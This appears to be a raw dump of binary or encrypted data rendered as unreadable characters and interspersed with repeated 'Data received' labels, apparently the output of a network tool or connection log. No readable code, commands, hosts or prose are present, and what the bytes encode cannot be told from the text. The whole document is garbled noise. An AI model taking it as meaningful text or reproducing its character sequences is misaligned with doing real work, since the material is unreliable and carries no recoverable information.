¨æªpÒÕú×©,Ôò±BÑ9L¹ìÂAH0ç~ío¬òÜa²¨µV-6üê%æ^P10¥<;5M¡HHåíâç¼¢ÈÊôÛH÷§ðþ°1Í¼zÛð¿~_DkVIëézKa,à²WWWµ&:±F¸(E:¢oDÕ¹ðE6Oaj]SHàÈJy%XN{¢SU;=¿DÀ]¤²v=6ÝüI+4¢®àZùBMh.cÑ/·Â}è³ðR"vÜ&Q<Å`´âNÞGWÄÞ/ãUóÿÞaå"ÕÊT«:.´³Øad&·zPøÚÐ£9a¨°àÝÈ¸Ðv~üÎø\|Nmª® úñØîj8e3X4µÏrqrýØ] $ÅÞèÒB ¶¿å¦ K~0 ÄÝcÛ£î¶\ÑE\K>ÂþÄO)Cv&¦®ø-Â,3»Àlíù\|´q¹Ö'º_4`+¼.LÆêÈ`ÍÑaïMG+^uGì7(ÿ RÌK\rA4¶»Øùî aZÒ7'9j,ÉBÖGjd¨(ÑG¢Dy(.f£X,÷x\|<È¶UaìÖ{2!§WeÂ<ÇOæãÂ$°ÕÉz1yYi4Iå2j^[UDD[6SüÖµþà¦±#û(ÓN/f 7B32Ý"&½4¾ÚÎ6_ÎD~±XÈmHq¼ÃÕýrC²JIë£Aºp7¼õYt ¢ÊÔüâû¯÷Âb?EÞ;.±CúÜò(×ÁjÒÃmiÂq2ÃÊ&iÂåø@Æ{AöNü û¨íø=¹+ßL[·ô~(&ºÊ¹'¿úïèqô©6©âPðÈöWp~øGª¼'Épê<ªRÕQ£ÍÃg7ÂWÏ±%éÑCQ¹ÎS©Z2iDÌs¤Èã´a]>(zô¼¼ËUæ{¢é(9ïü»ôïJ{Fò B`r¨~\fÀ¿FUHc ñ½²\$6Ô® ; ©)"óöÈz#£ÜàÞ¸¦!±þñûgªì¡MùÔs¦5 y(à@cP`59¥RUÜ§'@3ÂiR-²xâxIh½à²o ¿Z¢Ü¹ çÖëñ0J49H\¼ÆZ3 èîÈf%ï¿S½ãç Q(Çï/>FôªM:üØÑhMP¼YóGù ~Oú?OÊ#_ ,@f"ÃPÙ0+ùÎhD)ÐWÃVmKsØñ?B@ÓLzßÔ²wo é·Báe3Vká ²BÉ\ßqÊßÃîìÑ{S:ÑH@ ]ámÞb½6®Ø¿Dÿ¢O?Ü`+Ï(Ô2.à\?Â.^z1ìï MÁ\]F]5µÝXÀ½³Öa·aë}[¶æ\|SÄn÷EêSü7ëµ.¸4»RTáJM[nó(B¦^/.v'±ÌIhÍÓ¶£eØÞêí¤pAéÒ]¡@']#S ÏõÙæºÕp`ËÏÅe`Äe èfdQ»Ën´·<$h ¶wG8Ã cØ\}û^ÇaW£U2ù³½á È&LwJq²ßÂt uÊWºØ¹R{Ín¤)m>%/vâà½^ò°,çs7Úö7@æ1ê{ôn¼7£9®y<ù;\d0ïkÿE}ºïàè(O9äÃ{ðI´)hFûN8 æ<¾¹/»½M&¨¾hw,2?8¹êÙê{³»8Õg7Fh¨Ø£^ÿfÑ<ê8õáõRf¼»±«ÿ(xÿg"BÍ¶¨æ `-ûûvb½ç%Ì¶3ÑîÜ®¢ºÌ»:`ø\|ì_±¤Ëd5¿9òÑÒZA¬¹\|2hq¯+û-É¢ãj0¼®ø4yD¬â³qBdÊÝ« ðRÈ\@Óü\|é§>Î@wå½áZOYïBgµÏaÈ3Tå$8×/¬òÿÐ·¥ÃãG jAPûð§¹ãj)^[lÖìËæï pLâ=æË¼zY&^9ZÜ $· úà:÷ÝÍÂDØhÞ+7Cw}m¶&Y `NÑfybùciÏH>ýEý°!©êâË ?ÞY÷ÌËÑ=Ç²>å'ézühùÚo°[-bÊ] ö,ó=ùf¾ÁÔ]FÜ ûÈ¿¸COmlñ¸Q®?â© ±Eä9 í¿é=&Ümz&w48ÙÞ ÌG"_Cã³H ö6Ô"èäý]BdQùÑÚÅ!Hfd¦WÉ]'q$¨üùí³`½{-:óAEC¨¤[Ô¿ Jèihå¤æSîª èKë°Ü}+¿ÄÞî³=6³«JJ·H0äxä ÈÝ·o£º¡ÑÎö¢ÙvÉáÎyô«¾isà²ìÀÂOhâS5Uóÿïæ T\DkwéJ½±eu]]_L&sEÆy×Bï'o¥ [R¡ÿJg»é;ÚÛúØã@ØÍ"3'ú¯}´^Æë¤Äå©³;ôuú)²Hi+B@Zéh+¥±SìÃ!z1 ÞmW\|Ùcz¢p/fÔ^â(Õß+£zqf`É$Âá" C~÷Gï
Data received	$í*Éå¾L/-°\ZFrÖÙ@j/3CÉ
Data received
Data received	ÿüVZÅ! &ÚxüùIPå÷,;©»Ð¶åöb
Data received	ïw§ER¤Õ\|x_(óÒG<(Õ>°ÕTgÈcyJl>öæ°ø÷¯/¹V#Gg ªiK«Ø Uóÿ¤-op¤ëJÎz]ëÀt'qx¿Vh;®nA¦P&0;Ô7ÂUÎ¯ß PÆ)Î0ÒÛxZÍæçMuGþ[(ØÇuäÓ!Êü_áI'Ð<ð}.7'ÀxûkäÆß`¹!ÔÑÇõ·\ ¦[Ù<ÁgëgÙ(ÕÖ'R87®ÈyÔ©ÃØm@Ðü^¼Úì1ùD¥rL}ÞvltùÒc6äWÉÙlÔ ôÊÄÙhæð=kâJT²\|P¾v3-~W:ØìG÷Q\Í5ºùßÏT´ê2nÝ`áOæ,&ï#õ/N²¹ºZ Ý%FgmF"½aë-ª:]/<%¾oA6õkYNèÀÉT.¾`¸_sËLuçxpô<`ÍÌCØbFÂØö#¸SPÀP°ÖfuÊá¶¨AÓ:{ÐËÞWzÖP´ÅjVüRMmîd)®øö>?tÄÕULf¸v7IpÝóîÙH¬uÎZs^oeÀKjU!Eza1(ú×ÕM(RACÕ VëÖl¯½1U,â¸§x\|®æãÂ¶(&ìÔXÑýxûÍ³Ûb¬y¬Êr¸ü»þdºøx'Kâ6uÅ=LQaÙ q^àI<¨}TòO¿yÚÓüDÍ=C²&5Ø`ÉPM«×¤ügàF\|+XQÙ9Z}ÿ?gpftÒê!Zû©L"0hs¼t`¶©ý°Uß£TR#H33XôÔ]Ý¨SJ`èÃrîU tÏ×È º¸ÄLÏSiválòW¯Âéßb« N»s+ ` ü;÷Sá'@FµàüL_ÎQ{DWèP$÷þ¨\¾qèA =Z_þÈQWAÁ ¼trÍBkòÿ`ÕláIÝDøéøÈx´¸ußùPGçåYDî!dÎÝ§.£bR?Á{Ê¨s`U¬ º$êÝéõôA¾5¶¸óIèön!®o,Ã~Y Î»´pìQÒÅâAp@½6w^'ºë°Z`ZÔÄrñÁN)ôâÿñ¯m'\|KÃê«ÎPcØ¢-ìqqZûÔG¡«&N0(£´ëb@4 QO
Data received	)/_Ë\µc\|î}}Õ,Ò léSºup©U½
Data received	´wÌ!tI¡V¶5Ùtõ=Y5À,w\|¬W ú¾TÊ@?©áK)ÎT¡ïf«OTEaA4BiÇäÿsÀC$LPgÔnK¾/}®;?SjÊVUÕ ¿ßvBTÑÚÖÅ"~Å¼?'ï@`Gcõ©»~üórÑî]DGºÐ MûZÍÌ·¸²¶½\|P<16ÔÔ°aHÒ¹ýþÕwïÌÊae `úd7H+,bùöõïí-ÐW#ÏçÎeæ,§ÉÊØ£ ÆmrkW1²?nF5pØH¢Òÿ6 Èõ;ecyä%ñ#1ð â$Hñ£b÷ùèÆ{di¬ ê¶çægæãH»{pÅü]ýa9ÚìufsÈºÝêâÌ±úuÂ 5¬¥4h]xçgsæ1Õg¾;ÒûxjÙ.×IÉ7 M'°ïºnºfþ`l,s·£TRkÑç~"2@·ñÐFòiR5½öJæ=ØX-®{ÄþÜ¢J©ìp£ØòÜÒµµJuÃlÒYÇ^ÝºÈNp¬èuýnA£ì e[ôÁ´YuUwC àÖ<3¥;¨¥ï`¿¤m¡5!åÞö9úêé×£X±FÿdËáìJq¼à7¸+<Zgû×½l×¨}éÚT#íw)GNòÉÞÆ¥2u¡©´èÞ½APµ¢C¦ÿó'R°½SUýe{«§pøWæ<§Aû£PhK;Á«î9¶¶¤Ù½Â£ßÉAêá¯7X&½z¶jÓCÂÈ> æ;· fé»¥W+²Åz<MjõWk²ÆÞ¶Ëáö^4¥®ªí]÷^%(V» âC¯¨ýFÞñ³NÐ-»Øÿ]wÝ¾gDÒJå>èÒÙNñ@ÖÚìø¯1twºÈo#ÃQíµ8_¨6ZW3búÅËz¯}·kÔ¤¶ºMÚx:oïBßêFi3âÙ¾«åx]qÈÓ·G¶JÁ(+s^¥ÎÏ¿_Ó j×U5Õì: FÎqÌøÇA=×Îñ`pD¡Vn¦.#z>§¬if¥$ ÿ6Òqilyfèòaöªfäõsïi¿Y¯Àö·kñþI`Yîy9í×IX;)Ã¾ )D@Eö×5;çÉú\|AØÈm¡ÿºØöÄ¢yu6`ç{D·È_4DÞµ: Td¯mSìà;Ö©°ÍÌ@p1r.Ôáæ ùØW^3A³xxÖâþ°»mòwA~KJ d¡ÿ¯-íÁD~=(ÕÐÔ 95Ô;ñôiÆç´´^{¡7g×QÐ¬W¹·-Wfþi°ÙÎÕÆ&`W«¯Þ7æ=ß!àÛH©S1(â;óÎÊÚ:8h«~2z²ù¾çÛx¿äî>°QYW zÙþý8{)1é»ÿàF«0ØÚ T¯Õõ\µRï-Ì§£'É´Ë±`/Ðjª^}B4sYè¶kCúw+%ÀI±ès¨`&b¹©àTÓÇÚÉÄ~tÚ÷½eÑ;÷7ä4ÝO£mÝyÈDµS ÛÛïÃÏúæ!/wé8£¸ãå]ø>0C¼%u25/i4zs÷%\n<z1-ý3j¨§@lj,ÁCXî4&A/÷¨gxl%!z-§åVQ°0ÿöð£#}wiû]Ì¢ìª@T ÃvAEØu8¥Ì¶T@°qUSò¹æä¤ûàèûhîKÜ¡ ÔãXfÌe<d¨IÆ#ã87raih##¾pj«#ÌZäèÂèïþæÕ!0ÂLñ;C6¬@÷e3Ü.c×¯Âþ{^x¢g¨ (MW'°µµie?UÎÀr[*+uÒmük]ö!ÙKZÚ3yFT7ì£Ì³ê3´Ëx3JMPÎ³èëD'jÈK$Ów,=B1gÍUô]K_=ç·EÓ]rßêÝpPÀ LÈià6ÒÓBñÀHí¿â3±NìßüotFÊþÊ\|ì\|Íð§´ÃCòy\ÖPá'Ò¹ê?ñÆ[híÁêÃa^¨7E8-¼í3ºr-Ù½¹·DGpß5à@·LËä·F+~¿Õ,N@Ü%XûÅµ"ÍqÞMÖ³àÄ!yíë¾"¨<ßüA§ÎSÞPä>dNYJFèWEõB=4IîÏõñ-hH`$ÍúÐ({BÇè!',Z5ú6K$ÐËö2í÷
Data received	}9>HñìÁ::f·dVmCJûèÏLË¥ò
Data received	våvh-°#ÇW9r/J©¯6/éAÈéãÛ9
Data received	:Ýñ æ&t ÖÉ£ØÙè3sºZöÉhòÚ^X*VÊ
Data received	ÙHÙ!]þUñÏ+ôqNÕ:;4J/¤w >È©
Data received	4Iª7Bíßóyª;^ß`¬§Ó,>LeüùîÅ¦brûGÛ½X±.¾#vÿý¥û]½AÕ¿jaÓÓëÍ'§¨Uæñ$°YC+NÚíhui6²oýdª`B·Ãr6!xIûPp·8õ¾Nb=ÁÞ ÒÑ¤VJøA[5 ³õ9 üyòè<]?'{3hÿ¢,Z<9ça;í L í¥Áà«r\|æµ¶ìJ¸Í01RTc{ùz¸mÁzæÌé¸Ò÷¤'Ú¢w~² û:ó ^ßp.Ç·¸»h)ý¦pS§Õ»R$æÂÜ\|ìýÛiçlh?Æ¨QÓ¸þ#×¯ú«Çû¦.Jx®ZÜ±¨1 »&1@Y4}fÆNÏi-ëÒ^ ürÔt`Zz ÚN´c$K=ko¤ÎÏß.ÊÑ8¦®¡$¡sOfüwý]¨Ù$F!½g×Ûe3PöDNf+7¶Ðfäô³ <N`å [ªfª6JLµu¿ ^ýrl E^¯»´Z60Å[ ´/ÝÈÒEbàÃ8_pòSvf¼ÛâtD4y¾òð·nbþs¼ÎjÖùLV§ãUÏ=aV¯}Ø·ó4Þú ßUÈ¢{ÂFC=Ò U:4#$¿¼_l«kþÏ?ÝRYÄÞIdÒ²Â ¶^(n±àîfÕ1Å±mTx Mô>aLågÖÈ[Âyö¡e¡Ä^Ó×ÈÅ£UÁÄ(~5ÑÊÆò£ý$¸Ù¬P×SJÊDÂ¤ÑuD9). [¢)'XûÁ?í-S¬¯ ßþÈ §Ç¹,e·ã/ùqÁ8rÕx§Ê¿Us¯Ù½N]?±ÅÂnj/WU³nS9F(Pÿþððpþ1êiþªwcTQ¡'ÏÄ=úÏ~Õ8ÞºÌ8R"&wzl£KÎ¿?p¥^ùÚh©ùÙ·s_"P÷;e]C&í·[KÖ^>#Wmí(Ù¤0Û³2[dD½£"9)A2¦ë¦é»\È©¼ã »?fµ¶9Ü»ÌNú¶ ùõÝBééY,.àè©«.ÈÃè¶îSlÁ©Ö°\ÑÅ+=a8!6¸íºb^Ùîª· è+da×]¸û> `ÎÚ®[ ôw±çô9ZÚíl"è[Y§§ ´kïï"ûµ%ÿêIKj:è[ \§¨ Rñë0?RÓ.`Q¹¨ªÆDk2¬';²cgÅ§³ªP@Â,Þ±kdz}BÂo<wÆ<u÷s»U«ÄÕ^îHÕtm¯\|è§Ð¨¡äw FWªÙ!¢éûò»v_jò!AbÖrmv`Ä+Z¾GMDsµz<EæïZ)T¡¬<r ÞéB°Gå«üP»±<¸wãßº2À±©aa5Ðì¿pÞÕ~©»Ù2â]Lª¤Gã_}?ÐËµ£Ã2J¿9ö hìÕéÈÆ!Ö4þ©Ùs»âÇuKÂ·°#ãñ@qÕ³ZL@wdGR)0ÿÁú'fµÙ{DÖ$Èç¾]ÿÆ&Qça±!^B9U¥ËPaÝ÷¾ÚF ÉùÚ q:×à/½ÒYI&©ÜO(Û{î]Ge¬ÁX$$!RØ²Kx¶]VF}M3Þ¢\|ÕEñY¶ª4X»ÖT_ô£hÉ6ôÈZØdÉ»=óÆwîQäj@FEcÆAËZTM\|yFÊñôý(:¼hòn3}R·¹' l~ùÇbAØ[ûz¨¿Ëï#9yLP`9cÃÁ3UtPê±ÈIâÉB 5ªMØ"\ÌéDäúøÀâ%ú^´9Uf)÷K/X{¯ Å7`¿þlÇþôS)óCº»âà¼¿N}CµË-Cu"_.vMáUhR# /Eº2òÙ<Òp¾Å§? BÅPùI]\|8A$Ó5ÀSA[ÿFÒwõ{eTI!X4gÁ{Ãã³Ø¢é=Þë+à¢ïÍ9Oûnes5ü\| øl&ÿ&mèHG,,ü{E»¾«>ÀìGÜÃx4á1\Ê-Ówr å .þN¢uògZý«yÑÜ"Z[Ry^ Jº\|q0Ï-¾=3hln´y÷¹XÀKqX²$AÿÒÓËÝVTÆDàêPEùôåßÿ¿P¨¾ MïªåHw;9ÕI¡¶FøE9BôTòìµ4X8à®î¯,ÇÁ<êü½UQÊÀee7îM0¹ÍðÍùOAâ¼8d¤4 ¤ÀÁ¦1ÓÿÆ/oqÄ;üüfHDp}/?8¿£ä.FìãÀ½9Ñ \#~jBJ] Êdøjx±uïoJd%ól<kêxço~ëõ¿ÙæÎ+Û»Ýa´nr! eüØMnvLmàçÕ_Â.Ú%ÿqH\|ñ;Wó¥ªÒ&¿bÂnX7pÍHÜb^M_ß¬ô!>kYÕ°.úú S%©©«e×¼,EzÐ~TDæýËÆèÄ¬84¨nâ<ÒUQÆm @~/Ö6Õ¿]øK^Ò±7;ëô·§[èÏ8¶×:Ü<mÞóG²\/B@Ñ_dÇñYnÓ³Aº9XÐÜÏà\q©í¯ó»ñÄxUþØÖTÛGßpºVTkc;jLaåÁØÝ°ð+}¥áénNíeóôC)k9â(þøÄSýqãëY8ÇÜÍ»¹:/Y[vI½@-xÃT°èH= Í# áèÀÅïé÷3%³ÆÄúÅ?³ò¢är_É¹E>ØHß¼é$üªª)WIÒþb&Ý»¶pS[µOüGjrÙIÅX>D}a(ÁÀòAqÖf³® §i@ºQ±±ZÉËùÐ>ÅÂE·PyÐ1+?éÀN?^á¸çÌTIöpQÄ¡ÛïètÇÙâ«ß{ER6&ÐYAÆhÛi3³÷V¹(ß ÄWü?ø2£&Ôc:ãlc>G¦»lå¸ãÕ-wèÉ,/q0Ô´j0±¬ò¢SßÍÝYåÐ®ú?ãkÒ¸°¦]°³Ë=}OñT %OT/erøâ¼é_ ßµß7ûÖm¼iåÇýG4î£á¾,fÝ´»¶hA×ãÙûVóAÃFìþ JÜÏ$ö÷ù5)_¨~Gÿc£ÎLúuæÉÀ}û¸ëU¥ßPem¦ÒsG P@Q$Ê"5Hï ûañxÅ(]àtn\|Ó»<¿ÕQQ(¯«ÎAÞn¾d\|9,ú%Å>_OÓ¶>þPIÝÁ®HÚÒÿ:GìÐRÞ»°=5ðÕ$QâjBòó ÑàZâÝ±oÔ7ë¦_YÒ§T{\±8+{¨:ÏÌAË¶&ÞøXg$ê]rÛ<éÑ¥Ëª£oQOmÁõHÍ)âÑÒUÊ ó7Ejà¸©àÌÀ5ú«?Ü§iF×+WêÃÚÖ·RZÉÈj Àwöd³Å;!\üå¾aê½³ÞãSô%bßÜo[a>\| :Bp¡=èØ-\$ci ìÔ{e4¢üÇA$jWU¨¡8H{j¶_µËÍÀýÿ¡ªêL+äj®¥5J(ô¼maBåAbL}=ii²ê5ÉZ§7ßeû"HàE,aGi?äö÷:3¡ \|«xtÐ°ìG¡BKÓµºª§ëk'@¹º¼VWÄ[ª§wÓQ@QÀV³NîzãpFõtÞ{c ¢¡JAv5Ì¶Ô:YÞv¶Ë©á[Æ-·»L ^§`Èý\|ÙUÜÊûòNµ<æµÞ®²5LÌØ¢ÚU. )3 «¤îzÕNr¼GYñ8l}é#÷7«¯×9R¨bçÌh¿Jï_d,u[43ÉLíUTw¾ò.óNækqÙëYhë0¬U9¡Ý¡FBt¥UKö6¾É' Uz",þÍ°0»__rÀï4ªpby}¬NÕ¦ânp1WÎ&¦Ð¹ó5â«FØ¼\ÝM$êS0(^¦bäãw¹àÒ+¹Ïÿ´õÐk³${Ðé×~`FÈúN>}0b´Zâ§6qtpðXÇ,N@ôB` ÿ¨NgþÄ3ÛÄcxÖ°\|Ð&0ýG}²®èùL+øYiú.[ñ{v¾ø²dÿüB4ÛÚÉ¹äô²(\|×t'¤fô+¡ZCâ3õnÔAÐ/@ÖÒ·øòcml£=èâ!MZÂèÃðõ>/Ïv»Ó ~e¾!H<5Î-a\|Ø2cv¹ËìÅL?êãÕÆòµ]cfjCjÅÍmñ¹²?¿oy²LývÍ¥Â,å6.ØZ\|1Ì¸ê?6u]}#¥$ s;-ÉÃ1Aº®Ç]º¯v,¬åOÊ¡¹jøîýêÃA*Å¯bRFðâïèDÐÄ:+G>ûaYt_Øü²ÑönÑTuoíAÂqx ·ÀÜå¢]Y$7¦aGÃ+À
Data received	ÑUuPÂ9¤a&0Émbë¤¯:àd>3¤e]
Data received	-©8VËuÜÇ¥ÉvBÞ)« §8?¨©tëá -
Data received	ôÓZLðCùÄvXÌ«°ûz4×æ·uÉîÉæÆ¸«êj{Û:rÌÑØÓ:É§2bAÖG"ã]¥ÀàÕTýkG -úÐ'S±EÑbô÷:]Û+Î=q¦²PÝYÑ@åvÍô[äKvñ5VlGÂß\ïÅ²%<Ü¢5¤ÝÁé=RZ^û÷yÃæÏJMoàd ²âfZZ«Ô7~/0tpÈl1\/1H1M1[ü¤vøË:IÃvq'ZñÙ@éFAd!Æ`%5Ü £\6UÙòþ¿uÔÌ«æujoïsG9Ìÿµq¡µ}Æ{ÝS6Íï:÷ª\øB`P`,ÓÉçè8òÌ°`Ø~y^£7 [µC2t¡°±izÑ´ßÚ6nöppªq/ÅÆpÃN+A:W`UÿÀ>õÝ)é½R3&ÜÿîaÜìÄg%(sÑøJ°j?¡ ¶,[ÄZèRn¹°B>5x%<¬ö«EFfÁíÞêÈ g_ñ¯-ÔÏðYE¿î¢@`:9\xÍÑà³ºÎÛ%¡ÈU÷ê6Ía¥ãI³ýHuìàR8ÙSÃïR÷é(3 SbC»hh\åÇò¼~»Úl0©ßo-SvfÛ¹@øÈØFfxßZÕ=A#¸s5Ýå}õÃ¤>(¬àÒñÇU#N¼fêq}\|EY8ÅP¯&Ô±YðTËÀ¡ræQ-ô]ú×Óã_"<RQµÀcSôñ½Ä~¿×IÀ%ìÔâúmoqýµA(?ô&üüÆþ[¶ëmÌú AR[¢Iè+0ÉàIÕÎÿÝ&¤(dL&W¨{\|½êÞx/²ÖJ¥g !¡¸p`9o\|ÛEùÒX¶:ÿkË`2¡°xò®9í`ekÍàî9ál<;ë°¢%wwGÖÇ(áA¬fÿ;hå×"4n>öY·i.qDEüs·-Æ¨¾³îÀð:D Ei¡"íÖÉ`ÕÝ/º½Ü71Õ½ï¤ùhÉF A=I]¢e å,÷vH(øIn Æ+:àNL{Y<Ê4Çì6ÓèPÃÉöB¡ñºéø¸´ /ÿ2LÔÿ_X8ÉÔb²ÀÊïPÐ³K ¤éÊ<ý¿eÍj¢Û¦U=ÏnU¾¼ ¹ 4¦Ï©Ò!ñ##PFìb:8×,¤s¼èuºdÔMtÉVõNù¬Åõßò\&¤Ø0ShÁRDc[ÕÝþBtÐ¹Ä&"ë§ÕN}ãmâßÕ&;U¿éÒ©áOI?±pDÎ·À¹` ¶Ç\+ªââzÑú»lI©ÃËcz+:8C§VY«±)ï·ç ¿>â\ç¦Übj\| Fo!¬¬ÚÈBPõBÂqàÂÒ5$Ü;¶CmwÛL»õÃÔ¢ÚpM#%¶NËªxåÔÄøÐvSc®^òEî«l«æ¡>1$X¬É÷)-Ý ~Ùn8ÔÓ¥]4½z;:©75oxfCÝ«cµdJ4ZVù;C¥Vø);S^÷ÜH2Ù3pW /açFàÃi¾(js¿7ÆûÖo¼³=Îæ¹t=äÇ¢ÍTüøãÛÇ×àÇ"ð÷öÚòÛ]Ë°ËNÜdQ±DÕs-»ëôzÚûKMÓ°ïÎþÐ¿ì\z¨àþÒ¬rméåüÙ©y¾ªí>¼OñÙ0Îò5ï;Dq¸·èçfp²êHGøC·#ÖÒ}tùxÂF(\|ÇÓÁ'Ne+Î\tÂ«<Í&ÕT¯\Þü¥ÂDEöEyÏ·Áü®ÍÒß×7g'ÛÓlÜR\|PÚ\;]F]ÎÐòÖ\|ß×\¦·I$èE§ÞSÎ«ëC~®¤Â¶//}Ãc¨CGB¢3ÿôD4"¾Ã+²¯Û\Ô©¢)§`¬ªðeº¸«OX«a(´æORv!þÊQ»YïùwÄ°gRÞ«^9¥{¯Xfór²¡y+Eþ6Ó¨Tï`rWHÐ¿ÿ02n9éác½ï8¥(E=ß*Ü@WÕÈ ºu=²[ÁÅéâ§4»¨EHíÎÔLó,kÏ9+EË95vLÄm¤Ç±L«BÌµ>,«d¥d¾h@§è0;mj ×Îm_Õ½{õÎÕP]=¥Xúg)J°ÏC¿ Ì-TMÔrùYîÖ¾r`ªîP5ÎHExùR¸ õ¶ã¨ÿkå\Ú¶4 \ä¢ ¶×Ä#Ç>IVìTk¸O#ÐCroidg(8A NX2 TÝ4ÜýxAC;GÐ
Data received	¯øk4DÉ\äc°;¤ICû>¬¼Ø¢½,+¶Â6
Data received	æ<^Õ &ÊúÀæé.f²³r¼2è²ÀÕýÎ'
Data received	ñ«zO+lÿ¿`÷äl¬¶9}lOt®8n
Data received	jb¢Þ£+* D9BÎÚ%iYJ±@T
Data received	aØ!°o#éÕÑÍüvðÏ¯ºD1à4¾S8y
Data received	DáÁø0¸Â,x¶->D)Þò4WØ#`àLJÄÑ
Data received	1ðnÓÁüKeÐ/;Ï¦·_Vk.WòÜâçàÚêë²PDæ;D,q"!ÁK,^+rÿè!ýÅ¯D¨dè·ÄÈB¯·oZ6\9'ýYÑ`n9ã8ÌÁíøqîÇ²×9ßSüùü0+Í·{nàÆÐC eG´ñX¢¶ó+?I»túöËÎÑÅÕõ´#¡+Í ÐðëÜ$ø<û(w7¼"ÌN¤ÉØãíþáV.Dü¤©wxÁæ4ÌöøeIp(]eÆ2_Zó$µ¼×Öõöø©è³ç@¤âä}²JªøWïeeÏç!Ð ¡ÔüßíS£ß½´²]9Çóx~ñ{wRh_KÖÆ$d¢'²¹ÎÞÑ]AÓÌã\|%¦§\#eI²}W¨0ÚÍ¢üçjc/Ôu4ÔE6t$..ïjÔ{ÞÄÖToq¿ðódÍÝùCXy1G×`D¤ïÊæÝøåàU=éÍJd¬zã»£ÄÏÁáÍ¶hÃ×$:n¹çkJ{Vmt[bM %ÙÀØÖ×ÿ=uwÎÆþ%vÿ"x%×aM±uYÓ£wnyÿÍå@»Ë7,§2ÌìÍEpXÆ{)5³ÖÞº l×Ú¶zAø£unnK&Ù^['ÿ9 ^ÃÒá~¶êÂ³7éÊ¡næÎ°[DÍÛ=Íq_`H¡d,¬aÞ=âõ$²D0ÀUx Û®8Ô'UÄ>,oùç×AJCÕîÂ:ÆþÙLOWBQóM"RMyæZhÐQÁsh1^Ô1wñìõ\ê7+D³mßVa×øÍ<CV%"·¸¸¦ûï±þ¶±Ëe\¾ÓàCHÀËPÕès¬TÖNÒ!F¸hÆÏì§Vq&í¾Ý)qüPNc¢!hGX³2Äwu÷@PÖÒÏ´Jfè¢fü_òõUèù]\|ÂaÌMwé9VØ^@éà®½¬§<$¸&p5$P/dpgæq¿çú³Y7ÞP7Iûë8ÆRZU´ oU~7wH5hIá'SïbÕU_õDr°á´TÚ¾ù$pc®D¹Ü¿Ú/Rú±Oö4ïeRÁÛSðÿ¼ ÑÖ1«6¿ÝXQ ´²{{\»oÃ"-Êyû¸÷W4:W¹eú,çX9>a¶±x$)¹}Ü þ50ðÄ×æúÆ æÅbg@¡òyá!Æx@u°J`¶6+æ¤Ðû6Ã¥2º-kì$Ëõ)qÑ@J¶ps,¡ï<3Ó¸UÓ÷øÒ üN©³(¿Õñ±~ È¹5¤¼`lzý\§H-Í`ÕÇFß!Bþf¿¤ Îª"ýé7'r-Ímo¿Vç ¯©#Ú¾KJÄËjúLøÞÁtÞE¬:Ô&éÅC[6¼rKZHêëDêdé²ô(ç0¬¸É^³d-:ùàWU\|ìÑë»!Gr§@Ü§ÍjYºÈ,häÔ%·ySÕ"{¾ÌaÐ3Ë?V@Áåhéd)&Í-ôcSýü örÞY&í×$?&li^}ßpµ©jIòÞM³ÜúM'óïcâ Á°Gòþ÷TíØ!tó+Ç©3±þ·lµhù1ï3Tétå¼shikQè-t9 óê³¨Wæ5[þ"3i}RibîRôFü.v5î©PÊó6é<%ù f÷{vý?Ö½²^5Uô¥XJÌ(á)ÆcfÒæ=öâ÷-};ËØX\²/te3 UDx¹ h{áôAÅ"&eûTïºk?ÊªÀé Ïe¸/\|ÈÆò¥'ÐUr)Ázê-7ßÊ)êÑ²¢:Ðßc+ó#ê-ºekYÎØ!ª'¶V¬o£#ÞXô@:o7èIn«1ov0R\Ð-&,ûÆÓî0_K1aÌyñçâyTXuý+é~Ü©À<©MÆú´d'ÄtãçÊ":+j41q<ìC:°ñÒ,Ö±c`´#\|×øEÃJ4©N?éYkõD»·âÀjrôaÕU ºãI^1q»ðCqÇ\¼½Û<ô)Y´ðâÑ~m0#Úa]rvëMËOMíîéµÚ¤w!}Ð¼û4³[Ô~o7vÁó&Ï¤F¸QN[ÜXÿNp¶¸ºýzRÉyñûï3uGæëQnEh1 'n>Ô¶úi4föApLh'âÕh&é£\|p>ÄHóÍØ0ÜÃZ¼í¡o¤L#ìð
Data received	n?a¾£üác2M²)Úÿí6Z°{ÙÎJâZ\d
Data received	EllR\|1åEðÙÐ«ðÔ¨PÁâAmEHqÚ
Data received	Û¿4üþº VVckzË*MÆËf7Öo´ÜböÕÅ£/KT³ItÓoYýã¢¹®ÅaNeWð2G
Data received	H)BÜÖÇ´vææM`vU+ý½În_\K®9¢«53
Data received	8ÆOTF9±Üë(E}½l¾CÏ;§G\|h
Data received	·û²?ìÙ9ÉDo2¯¤ÈðüUøç¶hd6]ô
Data received	±:ÉÀûdq`é·Ð¸Ðb¾ÞÇÚ~
Data received	`)\|ÿÆjS°ÛÉÔ²ª@¿Ûæ&ûÕ
Data received	íRn<Á4M7¨\å÷û¸¼49 é'<©
Data received	WÀ¯ÈüÈ¢§ÆÆå=â¿ íØÅ<¸wÈ l³Ì¸4dªÊ¦sÁÕ<)Ótî_âî Vçÿ6Áµ×8R=h% Õ¼pçæBâ¹¹YLd^$£V±ÊNÔæáB±V×ÀÑº+'
Data received	µV7uXÆFÂÜ0}ÅgÐkØÄç
Data received	&!äá5v:E5õòe/»ÄLU¬ÚípX>Ï>,j»'fìE¥â¾±!béK Âú¹ìÛÎ^«¶ì¸ôîBG·k¨¹JÑÜÇ?Çã,ÚÚÏ^ï5 Q¿ «cZVN½#R÷ìÜ¼Àr6úy9Nñ7zl`¾ÌZk4ÂGæz1ÞYbºþ7Íú¶íï~fýÞ+Æ@ú¡¸@x·Ç¯ÒóæÊ,0¡.w¦)´5ÂÇ3ê]mäfw¢)eÓ]ãfyIÚ~ÂØÎnF¤ûÄ+E\6þ¬)M~åÉJÙ oãªã³Äï°¶20]-ÆèÃÁ BvßÃB¾i¡hÓïÈM«o¦H³,?æRXÉ ii¾-ö@à®h¿Öc«]±ëe.iú2 ns>o§¡wu6ñ\Ô&Û ÊIÝÒ&×,©STûðsÐÛÝKîöR¤\|k¹å×ÈVbRüV\#Gh±¤i;ÂëoâA÷ñ2ô(1#I#¼oMyÌù8PWÍ5$èð[{.âÊã^¨øÞ£ª;)¼=öò m\|cüYlðS9S{ÄÿÉùÎ%\|w«Jýèå¶»U]¥Î"Ç\YÀ"ºÎ@kd¸LÔÎ÷ÿR6q§ÿÖMVºÕ×ÒmÿÏòd,<ÞûdcGÇwú7ý£P¦§¿Ñ$8ºxÐçê77xÄþCêCà Ýdtï4\;Â©ä¤¢á[¬³N>Ln&H²^@Ê1ªóÏ¸=Üï¤'$Jî¸ûÈÙ¿´VJCSüçU 5´rsL'pÍ+tñLþFæÓ¥±½í&0kÀþ»AÚgOM§_/çmß-ÚÌìhHºE2 